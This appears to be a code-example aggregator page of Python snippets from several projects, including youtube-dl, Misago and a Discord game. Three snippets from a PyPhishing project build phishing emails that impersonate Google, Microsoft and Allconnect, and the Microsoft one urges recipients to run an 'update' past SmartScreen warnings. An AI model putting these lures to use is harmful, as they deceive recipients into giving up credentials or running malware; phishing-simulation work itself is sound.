    message = [_('SSIM log filename:'), [_('max generations:'), _('population size:'), 
              _('crossover probability:'), _('mutation probability:'), _('selection pressure:')]]
    dirname, basename = os.path.split(logfilename)
    if not os.path.isdir(dirname):
        logfilename = os.path.join(app.GetProposedPath(only='dir'), basename)
    default = [logfilename, [(10, 1), (30, 1), (0.6, 0, 1, 2, 0.05), (0.03, 0, 1, 2, 0.05), 4]]
    types = ['file_save', ['spin', 'spin', 'spin', 'spin', 'spin']]
    entries = avsp.GetTextEntry(message, default, title, types)
    if not entries:
        return
    # First clear the AVI from memory (to close the log file)
    txt = avsp.GetText()
    avsp.HideVideoWindow()
    avsp.CloseTab()
    avsp.OpenFile(filename)
    avsp.SetText(txt)
    avsp.SaveScript()
    # Run the optimization
    logfilename, maxgen, n, pc, pm, s = entries
    print _('Begin optimization...')
    print 'n=%s, pc=%s, pm=%s, s=%s, maxgen=%s (%i bits)' % (n, pc, pm, s, maxgen, length)
    sga = SGA(length, evaluate, int(n), float(pc), float(pm), int(s), int(maxgen), False, dump)
    sga.run()
    os.remove(os.path.join(scriptdir, 'ga_evaluate.avs'))
    print _('Finished optimization.')
    # Show the optimized results
    avsp.OpenFile(os.path.splitext(filename)[0] + '-optimized.avs')
    avsp.ShowVideoFrame()

Example 44

Project: Misago
Source File: createfakethreads.py
View license
    def handle(self, *args, **options):
        try:
            fake_threads_to_create = int(args[0])
        except IndexError:
            fake_threads_to_create = 5
        except ValueError:
            self.stderr.write("\nOptional argument should be integer.")
            sys.exit(1)

        categories = list(Category.objects.all_categories())

        fake = Factory.create()

        User = get_user_model()
        total_users = User.objects.count()

        self.stdout.write('Creating fake threads...\n')

        message = '\nSuccessfully created %s fake threads in %s'

        created_threads = 0
        start_time = time.time()
        show_progress(self, created_threads, fake_threads_to_create)
        for i in range(fake_threads_to_create):
            with atomic():
                datetime = timezone.now()
                category = random.choice(categories)
                user = User.objects.order_by('?')[:1][0]

                thread_is_unapproved = random.randint(0, 100) > 90
                thread_is_hidden = random.randint(0, 100) > 90
                thread_is_closed = random.randint(0, 100) > 90

                thread = Thread(
                    category=category,
                    started_on=datetime,
                    starter_name='-',
                    starter_slug='-',
                    last_post_on=datetime,
                    last_poster_name='-',
                    last_poster_slug='-',
                    replies=0,
                    is_unapproved=thread_is_unapproved,
                    is_hidden=thread_is_hidden,
                    is_closed=thread_is_closed
                )
                thread.set_title(fake.sentence())
                thread.save()

                fake_message = "\n\n".join(fake.paragraphs())
                post = Post.objects.create(
                    category=category,
                    thread=thread,
                    poster=user,
                    poster_name=user.username,
                    poster_ip=fake.ipv4(),
                    original=fake_message,
                    parsed=linebreaks_filter(fake_message),
                    posted_on=datetime,
                    updated_on=datetime
                )
                update_post_checksum(post)
                post.save(update_fields=['checksum'])

                thread.set_first_post(post)
                thread.set_last_post(post)
                thread.save()

                user.threads += 1
                user.posts += 1
                user.save()

                thread_type = random.randint(0, 100)
                if thread_type > 95:
                    thread_replies = random.randint(200, 2500)
                elif thread_type > 50:
                    thread_replies = random.randint(5, 30)
                else:
                    thread_replies = random.randint(0, 10)

                for x in range(thread_replies):
                    datetime = timezone.now()
                    user = User.objects.order_by('?')[:1][0]
                    fake_message = "\n\n".join(fake.paragraphs())

                    is_unapproved = random.randint(0, 100) > 97
                    if not is_unapproved:
                        is_hidden = random.randint(0, 100) > 97
                    else:
                        is_hidden = False

                    post = Post.objects.create(
                        category=category,
                        thread=thread,
                        poster=user,
                        poster_name=user.username,
                        poster_ip=fake.ipv4(),
                        original=fake_message,
                        parsed=linebreaks_filter(fake_message),
                        is_hidden=is_hidden,
                        is_unapproved=is_unapproved,
                        posted_on=datetime,
                        updated_on=datetime
                    )
                    update_post_checksum(post)
                    post.save(update_fields=['checksum'])

                    user.posts += 1
                    user.save()

                thread.synchronize()
                thread.save()

                created_threads += 1
                show_progress(
                    self, created_threads, fake_threads_to_create, start_time)

        pinned_threads = random.randint(0, int(created_threads * 0.025)) or 1
        self.stdout.write('\nPinning %s threads...' % pinned_threads)
        for i in range(0, pinned_threads):
            thread = Thread.objects.order_by('?')[:1][0]
            if random.randint(0, 100) > 75:
                thread.weight = 2
            else:
                thread.weight = 1
            thread.save()

        for category in categories:
            category.synchronize()
            category.save()

        total_time = time.time() - start_time
        total_humanized = time.strftime('%H:%M:%S', time.gmtime(total_time))
        self.stdout.write(message % (created_threads, total_humanized))

Example 45

Project: Jumper-Cogs
Source File: heist.py
View license
    async def _play_heist(self, ctx, bet: int):
        """This begin's a heist"""
        user = ctx.message.author
        server = ctx.message.server
        settings = self.check_server_settings(server)
        if bet >= 50:
            if self.account_check(user):
                if self.enough_points(user.id, bet, server):
                    if await self.check_cooldowns(settings):  # time between heists
                        if self.heist_started(settings):  # Checks if a heist is currently happening
                            if self.heist_plan(settings):  # checks if a heist is being planned or not
                                settings["Config"]["Min Bet"] = bet
                                self.heist_ptoggle(settings)
                                self.crew_add(user.id, user.name, bet, settings)
                                self.subtract_bet(user.id, bet, server)
                                wait = settings["Config"]["Wait Time"]
                                wait_time = int(wait / 2)
                                half_time = int(wait_time / 2)
                                split_time = int(half_time / 2)
                                await self.bot.say("A heist has been started by " + user.name +
                                                   "\n" + str(wait) + " seconds until the heist begins")
                                await asyncio.sleep(wait_time)
                                await self.bot.say(str(wait_time) + " seconds until the heist begins")
                                await asyncio.sleep(half_time)
                                await self.bot.say(str(half_time) + " seconds until the heist begins")
                                await asyncio.sleep(split_time)
                                await self.bot.say("Hurry up! " + str(split_time) + " seconds until the heist begins")
                                await asyncio.sleep(split_time)
                                self.heist_stoggle(settings)
                                await self.bot.say("Lock and load. The heist is starting")
                                settings["Config"]["Bankheist Running"] = "Yes"
                                dataIO.save_json(self.file_path, self.system)
                                bank = self.check_banks(settings)
                                await self.bot.say("The crew has decided to hit " + bank)
                                j = self.game_outcomes(settings)
                                j_temp = j[:]
                                while j_temp is not None:
                                    result = random.choice(j_temp)
                                    j_temp.remove(result)
                                    await asyncio.sleep(10)
                                    await self.bot.say(result)
                                    if len(j_temp) == 0:
                                        settings["Config"]["Bankheist Running"] = "No"
                                        dataIO.save_json(self.file_path, self.system)
                                        await asyncio.sleep(2)
                                        await self.bot.say("The Heist is over.")
                                        await asyncio.sleep(2)
                                        if settings["Heist Winners"]:
                                            target = settings["Config"]["Bank Target"]
                                            amount = settings["Banks"][target]["Vault"] / settings["Config"]["Players"]
                                            winners_names = [subdict["Name"] for subdict in settings["Heist Winners"].values()]
                                            pullid = ', '.join(subdict["User ID"] for subdict in settings["Heist Winners"].values())
                                            winners_bets = [subdict["Bet"] for subdict in settings["Heist Winners"].values()]
                                            winners_bonuses = [subdict["Bonus"] for subdict in settings["Heist Winners"].values()]
                                            winners = pullid.split()
                                            vtotal = settings["Banks"][target]["Vault"]
                                            vault_remainder = vtotal - amount * len(winners)
                                            settings["Banks"][target]["Vault"] = int(round(vault_remainder))
                                            dataIO.save_json(self.file_path, self.system)
                                            multiplier = settings["Banks"][target]["Multiplier"]
                                            sm_raw = [int(round(x)) * multiplier for x in winners_bets]
                                            success_multiplier = [int(round(x)) for x in sm_raw]
                                            cs_raw = [amount] * int(round(settings["Config"]["Players"]))
                                            credits_stolen = [int(round(x)) for x in cs_raw]
                                            total_winnings = [int(round(x)) + int(round(y)) + int(round(z)) for x, y, z in zip(success_multiplier, credits_stolen, winners_bonuses)]
                                            self.add_total(winners, total_winnings, server)
                                            z = list(zip(winners_names, winners_bets, success_multiplier, credits_stolen, winners_bonuses, total_winnings))
                                            t = tabulate(z, headers=["Players", "Bets", "Bet Payout", "Credits Stolen", "Bonuses", "Total Haul"])
                                            await self.bot.say("The total haul was split " +
                                                               "among the winners: ")
                                            await self.bot.say("```Python" + "\n" + t + "```")
                                            settings["Config"]["Time Remaining"] = int(time.perf_counter())
                                            dataIO.save_json(self.file_path, self.system)
                                            self.heistclear(settings)
                                            self.winners_clear(settings)
                                            break
                                        else:
                                            await self.bot.say("No one made it out safe.")
                                            settings["Config"]["Time Remaining"] = int(time.perf_counter())
                                            dataIO.save_json(self.file_path, self.system)
                                            self.heistclear(settings)
                                            break
                                    else:
                                        continue
                            elif settings["Config"]["Bankheist Running"] == "No":
                                if bet >= settings["Config"]["Min Bet"]:
                                    if self.crew_check(user.id, settings):  # join a heist that was started
                                        self.crew_add(user.id, user.name, bet, settings)
                                        self.subtract_bet(user.id, bet, server)
                                        await self.bot.say(user.name + " has joined the crew")
                                    else:
                                        await self.bot.say("You are already in the crew")
                                else:
                                    minbet = settings["Config"]["Min Bet"]
                                    await self.bot.say("Your bet must be equal to a greater" +
                                                       " than the starting bet of " + str(minbet))
                            elif settings["Config"]["Bankheist Started"] == "Yes":
                                await self.bot.say("You can't join a heist in progress")
                            else:
                                await self.bot.say("If you are seeing this, I dun fucked up.")
                        else:
                            await self.bot.say("You can't join an ongoing heist")
                else:
                    await self.bot.say("You don't have enough points to cover the minimum bet.")
            else:
                await self.bot.say("You need a bank account to place bets")
        else:
            await self.bot.say("Starting bet must at least be 50 points.")

Example 46

Project: PyPhishing
Source File: googleSupport.py
View license
def build_body(variable_dict):
    d = str(datetime.datetime.today().strftime("%A, %B %d %Y"))
    delta = datetime.timedelta(days=-4)
    oldDate = (datetime.datetime.strptime(d,  "%A, %B %d %Y") + delta).strftime("%A, %B %d %Y")
    currentDate = utils.formatdate(timeval=None, localtime=True, usegmt=False)

    MaskedURL = variable_dict['link']
    if MaskedURL == '':
        MaskedURL = 'URL_Placemarker'
    sender_in_header = variable_dict['headerfrom']
    if sender_in_header == '':
        sender_in_header = '[email protected]'

    rand_id = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(15)])
    msgid = make_msgid(rand_id)

    # Create message container - the correct MIME type is multipart/alternative.
    msg = MIMEMultipart('alternative')
    msg['From'] = sender_in_header
    msg['To'] = 'EMPADDR'
    msg['Subject'] = 'Returned email message'
    msg['Date'] = currentDate
    msg['Message ID'] = msgid


    plaintextBody = '''Google Support\nEMPADDR\nLynn Bisson (Google Support) has sent you a message:\n
{0}\nUndeliverable messages.\nMore information\n_____________________________\n
This e-mail was sent to EMPADDR.\nDon't want occasional updates about Google activity? Change what email
Google Team sends you.
'''.format(oldDate)

    htmlBody = '''<div style="background:#fff">
    <div style="max-width:700px">
        <table cellspacing="0" cellpadding="0" style="font-family:arial;font-size:13px;color:#666;border:solid 1px #f2f2f2;width:100%">
            <tr>
                <td style="background:#f7f7f7;padding:0px">
                    <table cellspacing="0" cellpadding="0" border="0">
                        <tr>
                            <td style="padding-left:10px">
                                <img src="cid:[email protected]" width="120px" height="50px" alt="">
                            <td style="font-size:18px;color:#ccc;padding-left:10px">Support
                            </td>
                            </td>
                        </tr>
                    </table>
                </td>
            </tr>
            <tr>
                <td style="padding:10px">
                    <a style="color:#245dc1;font-size:18px;text-decoration:none">EMPADDR<br>
                    </a>
                    <br>
                    <span style="color:#333;font-weight:bold">Lynn Bisson
                    </span> (Google Support) has sent you a message:<br><br>
                    {0}
                    <br>
                   Undeliverable messages.<br>
                   <a style="color:#245dc1">More information
                   </a>
                </td>
            </tr>
            <tr>
                <td style="padding:10px">
                    <a href={1} style="font-family:arial;display:inline-block;padding:7px 15px;background:#5284d4;color:#fff;font-size:13px;font-weight:bold;border:solid 1px #245dc1;white-space:nowrap;text-decoration:none">View Messages
                    </a>
                </td>
            </tr>
            <tr>
                <td style="font-size:11px;padding:10px">
                   <hr noshade size="1" color="#f2f2f2">This e-mail was sent to
                    <a style="color:#245dc1;text-decoration:none">EMPADDR
                    </a>.
                     <br>Don't want occasional updates about Google activity?
                </td>
            </tr>
        </table>
    </div>
</div>

'''.format(oldDate, URL_Placemarker, URL_Placemarker)


    if variable_dict['attachment'] != '':
            filename = variable_dict['attachment']
            fp=open(filename,'rb')
            extension = filename.rsplit('.', 1)[-1]
            att = email.mime.application.MIMEApplication(fp.read(),_subtype=extension)
            fp.close()
            att.add_header('Content-Disposition','attachment',filename=filename)
            msg.attach(att)

    img_location = os.getcwd() + '/SupportingFiles/images/google.png'
    img_data = open(img_location, 'rb').read()

        # Record the MIME types of both parts - text/plain and text/html.
    part1 = MIMEText(plaintextBody, 'plain')
    part2 = MIMEText(htmlBody, 'html')


    image = MIMEImage(img_data)
    image.add_header('Content-Transfer-Encoding','base64')
    image.add_header('Content-ID', '<[email protected]>')
    image.add_header('Content-disposition', 'inline')

    # Attach parts into message container.
    # According to RFC 2046, the last part of a multipart message, in this case
    # the HTML message, is best and preferred.
    msg.attach(part1)
    msg.attach(part2)
    msg.attach(image)

    return msg.as_string()

Example 47

View license
def build_body(variable_dict):
    d = str(datetime.datetime.today().strftime("%A, %B %d, %Y %I:%M%p"))
    delta = datetime.timedelta(hours=-2)
    sentDate = (datetime.datetime.strptime(d,  "%A, %B %d, %Y %I:%M%p") + delta).strftime("%A, %B %d, %Y %I:%M%p")
    currentDate = utils.formatdate(timeval=None, localtime=True, usegmt=False)

    MaskedURL = variable_dict['link']
    if MaskedURL == '':
        MaskedURL = 'URL_Placemarker'

    sender_in_header = variable_dict['headerfrom']
    if sender_in_header == '':
        sender_in_header = '[email protected]'

    rand_id = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(15)])
    msgid = make_msgid(rand_id)

    # Create message container - the correct MIME type is multipart/alternative.
    msg = MIMEMultipart('alternative')
    msg['From'] = sender_in_header
    msg['To'] = 'EMPADDR'
    msg['Subject'] = 'FW: Message from the Microsoft Security Team'
    msg['Date'] = currentDate
    msg['Message ID'] = msgid

    plaintextBody ="""All,

Please see below about an urgent message sent from Microsoft this morning. Follow the instructions and
install the update to your systems ASAP.

1. Run the update
2. When SmartScreen pops up, click "more info" and then the "Run" button.
3. A screen may pop up, but that's normal. Everything should be updated after running.

Thanks,
CLIENT NAME

---------- Forwarded message ----------
From: Microsoft Security Team <[email protected]>
Date: {0}
Subject: Message from the Microsoft Security Team
To: CLIENT NAME <CLIENTEMAIL>

Hello,

There has been a recent virus outbreak in corporate environments that target out of date systems.
The virus corrupts and deletes all data on the affected machine and therefore can be very dangerous.

Please download and install the updates manually at the link below, as we do not want to wait to push it out in our normal patch cycle.

{1}

Thank you,
Microsoft Security Team


Note: Please DO NOT reply to this email, this is an un-managed email address. Replies will not be received.

--
    """.format(sentDate, URL_Placemarker)

    htmlBody ='''
All, <br><br>

Please see below about an urgent message sent from Microsoft this morning. Follow the instructions and
install the update to your systems <b>ASAP</b>. <br><br>

1. Run the update<br>
2. When SmartScreen pops up, click "more info" and then the "Run" button.<br>
3. A screen may pop up, but that's normal. Everything should be updated after running.<br><br>

Thanks, <br>
CLIENT NAME <br><br>

---------- Forwarded message ---------- <br>
From: Microsoft Security Team <<a href="mailto:[email protected]">[email protected]</a>> <br>
Date: {0} <br>
Subject: Message from the Microsoft Security Team <br>
To: CLIENT NAME <<a href="mailto:CLIENTEMAIL">CLIENTEMAIL</a>>
<br><br>

Hello,<br>
<br>

There has been a recent virus outbreak in corporate environments that target out of date systems.<br>
The virus corrupts and deletes all data on the affected machine and therefore can be very dangerous.<br>
<br>

Please <b>download and install</b> the updates manually at the link below, as we do not want to wait to push it out in our normal patch cycle.<br>
<br>

<a href="{1}">{2}</a><br>
<br>

Thank you,<br>
Microsoft Security Team
<br>
<br>
<b>Note:</b> Please DO NOT reply to this email, this is an un-managed email address. Replies will not be received.
    '''.format(sentDate, URL_Placemarker, MaskedURL)

    if variable_dict['attachment'] != '':
            filename = variable_dict['attachment']
            fp=open(filename,'rb')
            extension = filename.rsplit('.', 1)[-1]
            att = email.mime.application.MIMEApplication(fp.read(),_subtype=extension)
            fp.close()
            att.add_header('Content-Disposition','attachment',filename=filename)
            msg.attach(att)

    img_location = os.getcwd() + '/SupportingFiles/images/microsoft.png'
    img_data = open(img_location, 'rb').read()

        # Record the MIME types of both parts - text/plain and text/html.
    part1 = MIMEText(plaintextBody, 'plain')
    part2 = MIMEText(htmlBody, 'html')


    image = MIMEImage(img_data)
    image.add_header('Content-Transfer-Encoding','base64')
    image.add_header('Content-ID', '<[email protected]>')
    image.add_header('Content-disposition', 'inline')

    # Attach parts into message container.
    # According to RFC 2046, the last part of a multipart message, in this case
    # the HTML message, is best and preferred.
    msg.attach(part1)
    msg.attach(part2)
    msg.attach(image)

    return msg.as_string()

Example 48

Project: PyPhishing
Source File: xcel.py
View license
def build_body(variable_dict):
    d = str(datetime.datetime.today().strftime("%A, %B %d %Y"))
    delta = datetime.timedelta(days=-1)
    oldDate = (datetime.datetime.strptime(d,  "%A, %B %d %Y") + delta).strftime("%A, %B %d %Y")
    currentDate = utils.formatdate(timeval=None, localtime=True, usegmt=False)

    MaskedURL = variable_dict['link']
    if MaskedURL == '':
        MaskedURL = 'URL_Placemarker'

    sender_in_header = variable_dict['headerfrom']
    if sender_in_header == '':
        sender_in_header = '[email protected]'

    rand_id = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(15)])
    msgid = make_msgid(rand_id)

    # Create message container - the correct MIME type is multipart/alternative.
    msg = MIMEMultipart('alternative')
    msg['From'] = sender_in_header
    msg['To'] = 'EMPADDR'
    msg['Subject'] = 'Please Help Xcel Energy Serve You Better'
    msg['Date'] = currentDate
    msg['Message ID'] = msgid


    # Would be good to find a way to use first name here.
    plaintextBody ='''
Dear EMPADDR,

[image: $50 Visa Gift Card] Thank you for speaking with ConnectSmart after
setting up your utility services. We are committed to providing the best
quality service. To better serve you, please take a moment to answer a
short survey

{0}

regarding your recent customer service experience. Your responses are very important
to us and will be kept strictly confidential.

How to get your $50

*Step 1:* Take our short survey
*Step 2:* Be automatically entered to win a $50 Visa Gift Card!


 [image: Click Here to Take this Survey]
{1}



If you have any questions please contact us at [email protected]
or call 1-800-255-2666. Thank you for your participation in this survey. We
look forward to your response.


Best regards,
Your friends at ConnectSmart
Note: This offer is presented by Allconnect Inc. and is not affiliated with
your utility provider.

Copyright 2008 Allconnect, Inc
4 Concourse PKWY, Suite 410 Atlanta, GA 30328
Allconnect respects your privacy. As an Allconnect customer, you agreed
that we may contact you via email at EMPADDR.

'''.format(URL_Placemarker, URL_Placemarker)


    htmlBody = '''
<table width="663"><tbody>
    <tr>
        <td><img src="http://www.allconnect.com/25879/img/header/email_logo.gif">
        </td>
    </tr>
    <tr>
        <td>
            <p style="FONT-SIZE:20px;MARGIN-LEFT:5px">
                <font face="Arial, Helvetica, sans-serif">
                    Dear EMPADDR,<br><br>
                </font>
            </p>
            <p style="MARGIN-LEFT:5px;LINE-HEIGHT:26px">
                <font face="Arial, Helvetica, sans-serif" size="3"><img height="128
                    " alt="$50 Visa Gift Card" width="209" align="right" src="http://image.allconnect-email.com/86e7c8b3-f.jpg"> Thank you for speaking with
                    ConnectSmart after setting up your utility services. We are committed to providing
                    the best quality service. To better serve you, please take a moment to
                </font>
                <font size="3">
                    <a href="{0}" target="_blank">
                    answer a short survey
                    </a>
                </font>
                <font face="Arial, Helvetica, sans-serif" size="3">regarding your recent customer service experience.
                    Your responses are very important to us and will be kept strictly confidential.
                    <br><br>
                </font>
            </p>
            <p style="FONT-WEIGHT:bold;FONT-SIZE:32px;MARGIN-LEFT:0px;COLOR:#4d93bf">
                <font face="Arial, Helvetica, sans-serif" size="5">How to get your $50<br>
                </font>
            </p>
            <p style="MARGIN-LEFT:0px;LINE-HEIGHT:24px">
                <font face="Arial, Helvetica, sans-serif" size="3"><b>Step 1:</b> Take our short survey
                    <br><b>Step 2:</b> Be automatically entered to win a $50 Visa Gift Card!
                </font>
            </p>
            <p style="MARGIN-LEFT:0px;LINE-HEIGHT:24px">
                <font face="Arial, Helvetica, sans-serif" size="3"><br>
                </font>
                <a href="{1}" target="_blank">
                    <img height="43" alt="Click Here to Take this Survey" width="137" align="left" border="0" src="
                        http://image.allconnect-email.com/5f5637ae-8.jpg"></a></p><p style="MARGIN-LEFT:0px;LINE-HEIGHT:26px">
                        <font face="Arial, Helvetica, sans-serif" size="3">
                            <br><br>If you have any questions please contact us at
                            <a href="mailto:[email protected]" target="_blank">[email protected]
                            </a> or call
                            <a href="tel:1-800-255-2666" value="+18002454666" target="_blank">1-800-245-4666
                            </a>. Thank you for your participation in this survey. We look forward to your response.
                        </font>
            </p>
            <p style="FONT-SIZE:20px;MARGIN-LEFT:0px">
                <font face="Arial, Helvetica, sans-serif"><br>Best regards,<br>Your friends at ConnectSmart<br>
                </font>
                <font face="Arial" size="1">Note: This offer is presented by Allconnect Inc and is not affiliated with your utility provider.
                </font>
            </p>
        </td>
    </tr>
    <tr>
        <td height="20"><br>
        </td>
    </tr>
    <tr>
        <td>
            <font face="Arial" size="1">Copyright 2008 Allconnect, Inc
                <br>4 Concourse PKWY, Suite 410 Atlanta, GA 30328<br>
                Allconnect respects your
                <a href="http://www.allconnect.com/pages/privacy_policy.html" target="_blank">privacy
                </a>. As an Allconnect customer, you agreed that we may contact you via email at
                <a href="mailto:[email protected]" target="_blank">EMPADDR
                </a>.<span style="FONT-SIZE:7.5pt;FONT-FAMILY:Arial">If you no longer wish to receive emails,please select the link below:<br>
                <a href="https://www.allconnect.com/account/emailPreferences.html?=" target="_blank">https://www.allconnect.com/account/emailPreferences.html
                </a></span>
            </font>
        </td>
    </tr>
</tbody>
</table>
</center>
<br></div><br></div></div>
'''.format(oldDate, URL_Placemarker, URL_Placemarker)

    if variable_dict['attachment'] != '':
        # If a document is to be attached
        filename = variable_dict['attachment']
        fp=open(filename,'rb')
        extension = filename.rsplit('.', 1)[-1]
        att = email.mime.application.MIMEApplication(fp.read(),_subtype=extension)
        fp.close()
        att.add_header('Content-Disposition','attachment',filename=filename)
        msg.attach(att)

    # Record the MIME types of both parts - text/plain and text/html.
    part1 = MIMEText(plaintextBody, 'plain')
    part2 = MIMEText(htmlBody, 'html')

    # Attach parts into message container.
    # According to RFC 2046, the last part of a multipart message, in this case
    # the HTML message, is best and preferred.
    msg.attach(part1)
    msg.attach(part2)
    return msg.as_string()

Example 49

Project: youtube-dl
Source File: __init__.py
View license
def _real_main(argv=None):
    # Compatibility fixes for Windows
    if sys.platform == 'win32':
        # https://github.com/rg3/youtube-dl/issues/820
        codecs.register(lambda name: codecs.lookup('utf-8') if name == 'cp65001' else None)

    workaround_optparse_bug9161()

    setproctitle('youtube-dl')

    parser, opts, args = parseOpts(argv)

    # Set user agent
    if opts.user_agent is not None:
        std_headers['User-Agent'] = opts.user_agent

    # Set referer
    if opts.referer is not None:
        std_headers['Referer'] = opts.referer

    # Custom HTTP headers
    if opts.headers is not None:
        for h in opts.headers:
            if ':' not in h:
                parser.error('wrong header formatting, it should be key:value, not "%s"' % h)
            key, value = h.split(':', 1)
            if opts.verbose:
                write_string('[debug] Adding header from command line option %s:%s\n' % (key, value))
            std_headers[key] = value

    # Dump user agent
    if opts.dump_user_agent:
        write_string(std_headers['User-Agent'] + '\n', out=sys.stdout)
        sys.exit(0)

    # Batch file verification
    batch_urls = []
    if opts.batchfile is not None:
        try:
            if opts.batchfile == '-':
                batchfd = sys.stdin
            else:
                batchfd = io.open(
                    compat_expanduser(opts.batchfile),
                    'r', encoding='utf-8', errors='ignore')
            batch_urls = read_batch_urls(batchfd)
            if opts.verbose:
                write_string('[debug] Batch file urls: ' + repr(batch_urls) + '\n')
        except IOError:
            sys.exit('ERROR: batch file could not be read')
    all_urls = batch_urls + args
    all_urls = [url.strip() for url in all_urls]
    _enc = preferredencoding()
    all_urls = [url.decode(_enc, 'ignore') if isinstance(url, bytes) else url for url in all_urls]

    if opts.list_extractors:
        for ie in list_extractors(opts.age_limit):
            write_string(ie.IE_NAME + (' (CURRENTLY BROKEN)' if not ie._WORKING else '') + '\n', out=sys.stdout)
            matchedUrls = [url for url in all_urls if ie.suitable(url)]
            for mu in matchedUrls:
                write_string('  ' + mu + '\n', out=sys.stdout)
        sys.exit(0)
    if opts.list_extractor_descriptions:
        for ie in list_extractors(opts.age_limit):
            if not ie._WORKING:
                continue
            desc = getattr(ie, 'IE_DESC', ie.IE_NAME)
            if desc is False:
                continue
            if hasattr(ie, 'SEARCH_KEY'):
                _SEARCHES = ('cute kittens', 'slithering pythons', 'falling cat', 'angry poodle', 'purple fish', 'running tortoise', 'sleeping bunny', 'burping cow')
                _COUNTS = ('', '5', '10', 'all')
                desc += ' (Example: "%s%s:%s" )' % (ie.SEARCH_KEY, random.choice(_COUNTS), random.choice(_SEARCHES))
            write_string(desc + '\n', out=sys.stdout)
        sys.exit(0)
    if opts.ap_list_mso:
        table = [[mso_id, mso_info['name']] for mso_id, mso_info in MSO_INFO.items()]
        write_string('Supported TV Providers:\n' + render_table(['mso', 'mso name'], table) + '\n', out=sys.stdout)
        sys.exit(0)

    # Conflicting, missing and erroneous options
    if opts.usenetrc and (opts.username is not None or opts.password is not None):
        parser.error('using .netrc conflicts with giving username/password')
    if opts.password is not None and opts.username is None:
        parser.error('account username missing\n')
    if opts.ap_password is not None and opts.ap_username is None:
        parser.error('TV Provider account username missing\n')
    if opts.outtmpl is not None and (opts.usetitle or opts.autonumber or opts.useid):
        parser.error('using output template conflicts with using title, video ID or auto number')
    if opts.usetitle and opts.useid:
        parser.error('using title conflicts with using video ID')
    if opts.username is not None and opts.password is None:
        opts.password = compat_getpass('Type account password and press [Return]: ')
    if opts.ap_username is not None and opts.ap_password is None:
        opts.ap_password = compat_getpass('Type TV provider account password and press [Return]: ')
    if opts.ratelimit is not None:
        numeric_limit = FileDownloader.parse_bytes(opts.ratelimit)
        if numeric_limit is None:
            parser.error('invalid rate limit specified')
        opts.ratelimit = numeric_limit
    if opts.min_filesize is not None:
        numeric_limit = FileDownloader.parse_bytes(opts.min_filesize)
        if numeric_limit is None:
            parser.error('invalid min_filesize specified')
        opts.min_filesize = numeric_limit
    if opts.max_filesize is not None:
        numeric_limit = FileDownloader.parse_bytes(opts.max_filesize)
        if numeric_limit is None:
            parser.error('invalid max_filesize specified')
        opts.max_filesize = numeric_limit
    if opts.sleep_interval is not None:
        if opts.sleep_interval < 0:
            parser.error('sleep interval must be positive or 0')
    if opts.max_sleep_interval is not None:
        if opts.max_sleep_interval < 0:
            parser.error('max sleep interval must be positive or 0')
        if opts.max_sleep_interval < opts.sleep_interval:
            parser.error('max sleep interval must be greater than or equal to min sleep interval')
    else:
        opts.max_sleep_interval = opts.sleep_interval
    if opts.ap_mso and opts.ap_mso not in MSO_INFO:
        parser.error('Unsupported TV Provider, use --ap-list-mso to get a list of supported TV Providers')

    def parse_retries(retries):
        if retries in ('inf', 'infinite'):
            parsed_retries = float('inf')
        else:
            try:
                parsed_retries = int(retries)
            except (TypeError, ValueError):
                parser.error('invalid retry count specified')
        return parsed_retries
    if opts.retries is not None:
        opts.retries = parse_retries(opts.retries)
    if opts.fragment_retries is not None:
        opts.fragment_retries = parse_retries(opts.fragment_retries)
    if opts.buffersize is not None:
        numeric_buffersize = FileDownloader.parse_bytes(opts.buffersize)
        if numeric_buffersize is None:
            parser.error('invalid buffer size specified')
        opts.buffersize = numeric_buffersize
    if opts.playliststart <= 0:
        raise ValueError('Playlist start must be positive')
    if opts.playlistend not in (-1, None) and opts.playlistend < opts.playliststart:
        raise ValueError('Playlist end must be greater than playlist start')
    if opts.extractaudio:
        if opts.audioformat not in ['best', 'aac', 'mp3', 'm4a', 'opus', 'vorbis', 'wav']:
            parser.error('invalid audio format specified')
    if opts.audioquality:
        opts.audioquality = opts.audioquality.strip('k').strip('K')
        if not opts.audioquality.isdigit():
            parser.error('invalid audio quality specified')
    if opts.recodevideo is not None:
        if opts.recodevideo not in ['mp4', 'flv', 'webm', 'ogg', 'mkv', 'avi']:
            parser.error('invalid video recode format specified')
    if opts.convertsubtitles is not None:
        if opts.convertsubtitles not in ['srt', 'vtt', 'ass']:
            parser.error('invalid subtitle format specified')

    if opts.date is not None:
        date = DateRange.day(opts.date)
    else:
        date = DateRange(opts.dateafter, opts.datebefore)

    # Do not download videos when there are audio-only formats
    if opts.extractaudio and not opts.keepvideo and opts.format is None:
        opts.format = 'bestaudio/best'

    # --all-sub automatically sets --write-sub if --write-auto-sub is not given
    # this was the old behaviour if only --all-sub was given.
    if opts.allsubtitles and not opts.writeautomaticsub:
        opts.writesubtitles = True

    outtmpl = ((opts.outtmpl is not None and opts.outtmpl) or
               (opts.format == '-1' and opts.usetitle and '%(title)s-%(id)s-%(format)s.%(ext)s') or
               (opts.format == '-1' and '%(id)s-%(format)s.%(ext)s') or
               (opts.usetitle and opts.autonumber and '%(autonumber)s-%(title)s-%(id)s.%(ext)s') or
               (opts.usetitle and '%(title)s-%(id)s.%(ext)s') or
               (opts.useid and '%(id)s.%(ext)s') or
               (opts.autonumber and '%(autonumber)s-%(id)s.%(ext)s') or
               DEFAULT_OUTTMPL)
    if not os.path.splitext(outtmpl)[1] and opts.extractaudio:
        parser.error('Cannot download a video and extract audio into the same'
                     ' file! Use "{0}.%(ext)s" instead of "{0}" as the output'
                     ' template'.format(outtmpl))

    any_getting = opts.geturl or opts.gettitle or opts.getid or opts.getthumbnail or opts.getdescription or opts.getfilename or opts.getformat or opts.getduration or opts.dumpjson or opts.dump_single_json
    any_printing = opts.print_json
    download_archive_fn = compat_expanduser(opts.download_archive) if opts.download_archive is not None else opts.download_archive

    # PostProcessors
    postprocessors = []
    # Add the metadata pp first, the other pps will copy it
    if opts.metafromtitle:
        postprocessors.append({
            'key': 'MetadataFromTitle',
            'titleformat': opts.metafromtitle
        })
    if opts.addmetadata:
        postprocessors.append({'key': 'FFmpegMetadata'})
    if opts.extractaudio:
        postprocessors.append({
            'key': 'FFmpegExtractAudio',
            'preferredcodec': opts.audioformat,
            'preferredquality': opts.audioquality,
            'nopostoverwrites': opts.nopostoverwrites,
        })
    if opts.recodevideo:
        postprocessors.append({
            'key': 'FFmpegVideoConvertor',
            'preferedformat': opts.recodevideo,
        })
    if opts.convertsubtitles:
